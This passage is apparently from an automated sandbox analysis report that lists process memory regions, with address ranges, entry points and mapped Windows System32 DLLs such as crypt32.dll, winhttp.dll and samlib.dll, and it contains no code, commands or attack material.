start_va = 0x2400000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 2379 start_va = 0x7fffab4d0000 end_va = 0x7fffab64bfff monitored = 0 entry_point = 0x7fffab521650 region_type = mapped_file name = "locationframework.dll" filename = "\\Windows\\System32\\LocationFramework.dll" (normalized: "c:\\windows\\system32\\locationframework.dll") Region: id = 2380 start_va = 0x7fffab650000 end_va = 0x7fffab65afff monitored = 0 entry_point = 0x7fffab651770 region_type = mapped_file name = "lfsvc.dll" filename = "\\Windows\\System32\\lfsvc.dll" (normalized: "c:\\windows\\system32\\lfsvc.dll") Region: id = 2381 start_va = 0x7fffab7e0000 end_va = 0x7fffab871fff monitored = 0 entry_point = 0x7fffab82a780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 2382 start_va = 0x7fffab460000 end_va = 0x7fffab4c0fff monitored = 0 entry_point = 0x7fffab464b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 2383 start_va = 0x7fffadf00000 end_va = 0x7fffadf35fff monitored = 0 entry_point = 0x7fffadf10070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 2384 start_va = 0x7fffaff00000 end_va = 0x7fffaff3ffff monitored = 0 entry_point = 0x7fffaff11960 region_type = mapped_file name = "brokerlib.dll" filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll") Region: id = 2385 start_va = 0x7fffb16c0000 end_va = 0x7fffb16cffff monitored = 0 entry_point = 0x7fffb16c56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2386 start_va = 0x7fffb18e0000 end_va = 0x7fffb1aa6fff monitored = 0 entry_point = 0x7fffb193db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2387 start_va = 0x7fffab390000 end_va = 0x7fffab457fff monitored = 0 entry_point = 0x7fffab3d13f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 2390 start_va = 0x7fffab340000 end_va = 0x7fffab380fff monitored = 0 entry_point = 0x7fffab344840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 2391 start_va = 0x7fffab160000 end_va = 0x7fffab17ffff monitored = 0 entry_point = 0x7fffab1639a0 region_type = mapped_file name = "locationwinpalmisc.dll" filename = "\\Windows\\System32\\LocationWinPalMisc.dll" (normalized: "c:\\windows\\system32\\locationwinpalmisc.dll") Region: id = 2392 start_va = 0x7fffb0090000 end_va = 0x7fffb00b6fff monitored = 0 entry_point = 0x7fffb0097940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2393 start_va = 0x7fffab150000 end_va = 0x7fffab15bfff monitored = 0 entry_point = 0x7fffab1514d0 region_type = mapped_file name = "locationframeworkps.dll" filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll") Region: id = 2394 start_va = 0x7fffafec0000 end_va = 0x7fffafec7fff monitored = 0 entry_point = 0x7fffafec13e0 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 2395 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 2396 start_va = 0x7fffab110000 end_va = 0x7fffab146fff monitored = 0 entry_point = 0x7fffab116020 region_type = mapped_file name = "gnssadapter.dll" filename = "\\Windows\\System32\\GnssAdapter.dll" (normalized: "c:\\windows\\system32\\gnssadapter.dll") Region: id = 2397 start_va = 0x7fffab040000 end_va = 0x7fffab094fff monitored = 0 entry_point = 0x7fffab043fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 2398 start_va = 0x2500000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 2399 start_va = 0x2600000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 2400 start_va = 0x7fffab020000 end_va = 0x7fffab035fff monitored = 0 entry_point = 0x7fffab021b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2401 start_va = 0x7fffab000000 end_va = 0x7fffab012fff monitored = 0 entry_point = 0x7fffab0057f0 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 2402 start_va = 0x2700000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 2403 start_va = 0x7fffaaf60000 end_va = 0x7fffaaf79fff monitored = 0 entry_point = 0x7fffaaf62cf0 region_type = mapped_file name = "locationpelegacywinlocation.dll" filename = "\\Windows\\System32\\LocationPeLegacyWinLocation.dll" (normalized: "c:\\windows\\system32\\locationpelegacywinlocation.dll") Region: id = 2404 start_va = 0x7fffb45b0000 end_va = 0x7fffb46f2fff monitored = 0 entry_point = 0x7fffb45d8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2405 start_va = 0x7fffaae70000 end_va = 0x7fffaae80fff monitored = 0 entry_point = 0x7fffaae77ea0 region_type = mapped_file name = "dcpapi.dll" filename = "\\Windows\\System32\\dcpapi.dll" (normalized: "c:\\windows\\system32\\dcpapi.dll") Region: id = 2406 start_va = 0x7fffaae40000 end_va = 0x7fffaae64fff monitored = 0 entry_point = 0x7fffaae52f20 region_type = mapped_file name = "wificonnapi.dll" filename = "\\Windows\\System32\\wificonnapi.dll" (normalized: "c:\\windows\\system32\\wificonnapi.dll") Region: id = 2407 start_va = 0x7fffaae10000 end_va = 0x7fffaae3dfff monitored = 0 entry_point = 0x7fffaae17550 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 2408 start_va = 0x7fffb1130000 end_va = 0x7fffb1150fff monitored = 0 entry_point = 0x7fffb1140250 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 2409 start_va = 0x7fffaadd0000 end_va = 0x7fffaae08fff monitored = 0 entry_point = 0x7fffaadd9c90 region_type = mapped_file name = "aepic.dll" filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll") Region: id = 2410 start_va = 0x7fffaadb0000 end_va = 0x7fffaadc0fff monitored = 0 entry_point = 0x7fffaadb3e10 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 2411 start_va = 0x7fffac500000 end_va = 0x7fffac881fff monitored = 0 entry_point = 0x7fffac551220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 2412 start_va = 0x7fffaa7d0000 end_va = 0x7fffaa880fff monitored = 0 entry_point = 0x7fffaa8488b0 region_type = mapped_file name = "cellularapi.dll" filename = "\\Windows\\System32\\CellularAPI.dll" (normalized: "c:\\windows\\system32\\cellularapi.dll") Region: id = 2413 start_va = 0x7fffaadf0000 end_va = 0x7fffaae01fff monitored = 0 entry_point = 0x7fffaadf9260 region_type = mapped_file name = "rilproxy.dll" filename = "\\Windows\\System32\\rilproxy.dll" (normalized: "c:\\windows\\system32\\rilproxy.dll") Region: id = 2414 start_va = 0x7fffaa720000 end_va = 0x7fffaa7cdfff monitored = 0 entry_point = 0x7fffaa7380c0 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 2415 start_va = 0x2800000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 2416 start_va = 0x7fffaa700000 end_va = 0x7fffaa716fff monitored = 0 entry_point = 0x7fffaa705630 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 2417 start_va = 0x2900000 end_va = 0x2afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2418 start_va = 0x2900000 end_va = 0x29fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2419 start_va = 0x750000 end_va = 0x750fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 2420 start_va = 0x760000 end_va = 0x760fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 2427 start_va = 0x7fffafc70000 end_va = 0x7fffafc8bfff monitored = 0 entry_point = 0x7fffafc737a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 2428 start_va = 0x1a40000 end_va = 0x1abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a40000" filename = "" Region: id = 2429 start_va = 0x7fffaa230000 end_va = 0x7fffaa23bfff monitored = 0 entry_point = 0x7fffaa232830 region_type = mapped_file name = "bi.dll" filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll") Region: id = 2442 start_va = 0x1d00000 end_va = 0x1d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 2443 start_va = 0x7fffafc90000 end_va = 0x7fffafcc1fff monitored = 0 entry_point = 0x7fffafc9b0c0 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 2444 start_va = 0x7fffaa000000 end_va = 0x7fffaa09afff monitored = 0 entry_point = 0x7fffaa007220 region_type = mapped_file name = "settingsync.dll" filename = "\\Windows\\System32\\SettingSync.dll" (normalized: "c:\\windows\\system32\\settingsync.dll") Region: id = 2445 start_va = 0x760000 end_va = 0x761fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 2446 start_va = 0x7fffab0a0000 end_va = 0x7fffab103fff monitored = 0 entry_point = 0x7fffab0b5ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 2447 start_va = 0x2400000 end_va = 0x24dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2448 start_va = 0x2800000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 2449 start_va = 0x2a00000 end_va = 0x2afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 2450 start_va = 0x7fffa9e90000 end_va = 0x7fffa9f29fff monitored = 0 entry_point = 0x7fffa9eaada0 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 2451 start_va = 0x7fffaa2a0000 end_va = 0x7fffaa35ffff monitored = 0 entry_point = 0x7fffaa2cfd20 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 2452 start_va = 0x10d0000 end_va = 0x10d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 2453 start_va = 0x7fffa9bf0000 end_va = 0x7fffa9c41fff monitored = 0 entry_point = 0x7fffa9bf38e0 region_type = mapped_file name = "proximityservice.dll" filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll") Region: id = 2454 start_va = 0x7fffa9bc0000 end_va = 0x7fffa9becfff monitored = 0 entry_point = 0x7fffa9bc2290 region_type = mapped_file name = "proximitycommon.dll" filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll") Region: id = 2455 start_va = 0x7fffa9b90000 end_va = 0x7fffa9b98fff monitored = 0 entry_point = 0x7fffa9b91ed0 region_type = mapped_file name = "proximitycommonpal.dll" filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll") Region: id = 2456 start_va = 0x7fffaa360000 end_va = 0x7fffaa397fff monitored = 0 entry_point = 0x7fffaa378cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2457 start_va = 0x7fffa9b80000 end_va = 0x7fffa9b8ffff monitored = 0 entry_point = 0x7fffa9b81700 region_type = mapped_file name = "proximityservicepal.dll" filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll") Region: id = 2458 start_va = 0x7fffb17a0000 end_va = 0x7fffb1825fff monitored = 0 entry_point = 0x7fffb17ad8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 2459 start_va = 0x7fffb04d0000 end_va = 0x7fffb0501fff monitored = 0 entry_point = 0x7fffb04e2340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 2463 start_va = 0x7fffa9b60000 end_va = 0x7fffa9b70fff monitored = 0 entry_point = 0x7fffa9b628d0 region_type = mapped_file name = "credentialmigrationhandler.dll" filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll") Region: id = 2464 start_va = 0x7fffa9ad0000 end_va = 0x7fffa9addfff monitored = 0 entry_point = 0x7fffa9ad1460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 2556 start_va = 0x2b00000 end_va = 0x2bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 2557 start_va = 0x1d80000 end_va = 0x1dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" Region: id = 2583 start_va = 0x7fffb0640000 end_va = 0x7fffb064bfff monitored = 0 entry_point = 0x7fffb0642790 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 2584 start_va = 0x2b00000 end_va = 0x2cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 2585 start_va = 0x2b00000 end_va = 0x2bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 2586 start_va = 0x7fffafae0000 end_va = 0x7fffafc65fff monitored = 0 entry_point = 0x7fffafb2d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2587 start_va = 0x10d0000 end_va = 0x10d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2588 start_va = 0x10f0000 end_va = 0x1134fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 2589 start_va = 0x11d0000 end_va = 0x11d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2590 start_va = 0x2c00000 end_va = 0x2c8dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 2594 start_va = 0x7fffaaf80000 end_va = 0x7fffaaff9fff monitored = 0 entry_point = 0x7fffaafa7630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 2596 start_va = 0x11e0000 end_va = 0x11e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Region: id = 2597 start_va = 0x7fffb1510000 end_va = 0x7fffb15a8fff monitored = 0 entry_point = 0x7fffb153f4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 2598 start_va = 0x11e0000 end_va = 0x11e1fff monitored = 0 entry_point = 0x11e5630 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 2599 start_va = 0x11f0000 end_va = 0x11f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 2665 start_va = 0x11e0000 end_va = 0x11e1fff monitored = 0 entry_point = 0x11e5630 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 2666 start_va = 0x11f0000 end_va = 0x11f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 2671 start_va = 0x2d90000 end_va = 0x2e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d90000" filename = "" Region: id = 2674 start_va = 0x7fffabc10000 end_va = 0x7fffabc1ffff monitored = 0 entry_point = 0x7fffabc12c60 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 2677 start_va = 0x11f0000 end_va = 0x11f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 2706 start_va = 0x2c90000 end_va = 0x2d0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c90000" filename = "" Region: id = 2734 start_va = 0x11e0000 end_va = 0x11e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Region: id = 2771 start_va = 0x11e0000 end_va = 0x11e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Region: id = 2858 start_va = 0x7fffa8ed0000 end_va = 0x7fffa8f13fff monitored = 0 entry_point = 0x7fffa8edc010 region_type = mapped_file name = "execmodelclient.dll" filename = "\\Windows\\System32\\ExecModelClient.dll" (normalized: "c:\\windows\\system32\\execmodelclient.dll") Region: id = 2859 start_va = 0x7fffaf630000 end_va = 0x7fffaf6edfff monitored = 0 entry_point = 0x7fffaf672d40 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 2860 start_va = 0x7fffab660000 end_va = 0x7fffab6a9fff monitored = 0 entry_point = 0x7fffab66ac30 region_type = mapped_file name = "deviceaccess.dll" filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll") Region: id = 2861 start_va = 0x11e0000 end_va = 0x11e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Region: id = 2863 start_va = 0x11f0000 end_va = 0x11f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011f0000" filename = "" Region: id = 2865 start_va = 0x2e90000 end_va = 0x2f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e90000" filename = "" Region: id = 2870 start_va = 0x7fffaed20000 end_va = 0x7fffaf1b2fff monitored = 0 entry_point = 0x7fffaed2f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 2884 start_va = 0x2f90000 end_va = 0x308ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f90000" filename = "" Region: id = 2885 start_va = 0x7fffa6eb0000 end_va = 0x7fffa6efbfff monitored = 0 entry_point = 0x7fffa6ec5310 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 2886 start_va = 0x7fffb3b30000 end_va = 0x7fffb3b37fff monitored = 0 entry_point = 0x7fffb3b31ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2887 start_va = 0x7fffaa0a0000 end_va = 0x7fffaa0aafff monitored = 0 entry_point = 0x7fffaa0a1d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2888 start_va = 0x11f0000 end_va = 0x11f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Region: id = 3137 start_va = 0x3190000 end_va = 0x328ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 3138 start_va = 0x7fffaaca0000 end_va = 0x7fffaacdbfff monitored = 0 entry_point = 0x7fffaaca6aa0 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 3139 start_va = 0x7fffaa9d0000 end_va = 0x7fffaaa4efff monitored = 0 entry_point = 0x7fffaa9e7110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 3148 start_va = 0x11f0000 end_va = 0x11f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 3149 start_va = 0x11f0000 end_va = 0x11f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 3150 start_va = 0x11f0000 end_va = 0x11f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 3151 start_va = 0x11f0000 end_va = 0x11f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 3152 start_va = 0x11f0000 end_va = 0x11f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 3153 start_va = 0x11f0000 end_va = 0x11f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 3154 start_va = 0x11f0000 end_va = 0x11f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 3155 start_va = 0x11f0000 end_va = 0x11f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 3156 start_va = 0x11f0000 end_va = 0x11f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 3157 start_va = 0x11f0000 end_va = 0x11f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 3158 start_va = 0x11f0000 end_va = 0x11f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 3159 start_va = 0x11f0000 end_va = 0x11f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 3160 start_va = 0x11f0000 end_va = 0x11f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 3161 start_va = 0x11f0000 end_va = 0x11f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 3162 start_va = 0x11f0000 end_va = 0x11f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 3163 start_va = 0x11f0000 end_va = 0x11f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 3164 start_va = 0x11f0000 end_va = 0x11f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 3183 start_va = 0x7fffa48a0000 end_va = 0x7fffa48b0fff monitored = 0 entry_point = 0x7fffa48a1d30 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 3189 start_va = 0x2d10000 end_va = 0x2d8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d10000" filename = "" Region: id = 3190 start_va = 0x7fffaa990000 end_va = 0x7fffaa998fff monitored = 0 entry_point = 0x7fffaa9918f0 region_type = mapped_file name = "sscoreext.dll" filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll") Region: id = 3191 start_va = 0x7fffa4710000 end_va = 0x7fffa472ffff monitored = 0 entry_point = 0x7fffa4711f50 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 3193 start_va = 0x3090000 end_va = 0x318ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003090000" filename = "" Region: id = 3194 start_va = 0x7fffa46b0000 end_va = 0x7fffa470dfff monitored = 0 entry_point = 0x7fffa46b5080 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 3195 start_va = 0x7fffafe10000 end_va = 0x7fffafe3dfff monitored = 1 entry_point = 0x7fffafe12300 region_type = mapped_file name = "wmidcom.dll" filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll") Region: id = 3196 start_va = 0x7fffb0ca0000 end_va = 0x7fffb0ca9fff monitored = 0 entry_point = 0x7fffb0ca1830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 3204 start_va = 0x7fffaec20000 end_va = 0x7fffaed12fff monitored = 0 entry_point = 0x7fffaec45d80 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3205 start_va = 0x7fffa9f40000 end_va = 0x7fffa9fa6fff monitored = 0 entry_point = 0x7fffa9f463e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3206 start_va = 0x7fffafd30000 end_va = 0x7fffafd43fff monitored = 0 entry_point = 0x7fffafd32d50 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 3210 start_va = 0x7fffb4ae0000 end_va = 0x7fffb4f08fff monitored = 0 entry_point = 0x7fffb4b08740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: 